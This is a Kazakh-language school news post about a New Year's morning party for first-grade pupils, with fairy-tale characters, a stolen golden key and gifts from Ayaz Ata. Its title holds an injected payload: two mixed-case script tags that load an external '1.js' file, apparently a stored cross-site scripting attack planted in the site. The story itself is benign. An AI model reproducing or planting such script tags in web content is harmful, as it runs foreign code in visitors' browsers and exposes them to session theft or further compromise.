«Жаңа жылдық квест» операциясы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.12.2019

Көптен күткен және сиқырлы мереке «Жаңа 2020 жыл» келеді. Осы мереке қарсаңында біздің мектепте 24 желтоқсанда 1 сынып оқушыларына арналған жаңа жылдық ертеңгілік өтті. Мереке залында балаларды сүйікті ертегілердің кейіпкерлері Свинка Пеппа (өтіп бара жатқан жылдың символы), Микки Маус (келе жатқан жылдың символы), Қожа, Малифисент, Гринч, гномдар қарсы алды. Біздің мектептің оқушылары бірінші сынып оқушыларымен бірге би билеп, ән салып, ойындар ойнап, Аяз Ата мен Ақшақарды күтті.  Бірақ «Аладдин» ертегісінің зұлым сиқыршысы Джафар сыйлықтар сақталған сандықтың алтын кілтін ұрлап мерекені бүлдіргісі келді. Кілтті қайтару үшін балаларға Гринчпен би билеуге тура келді. Аяз Атаның көмегімен бірінші сынып оқушылары кілтті қайтарды. Аяз ата мен Ақшақар балаларға сыйлықтар сыйлады.  Мереке көңілді және әсерлі өтті. Біз жаңа жылдық ертеңгіліктің сценариін жазушыларға, барлық қатысушылар мен әртістерге шығармашылық белсенділігі үшін алғысымызды білдіреміз.

Просмотров: 714


Пікір қосу



Деректерді қолтаңбаға қосу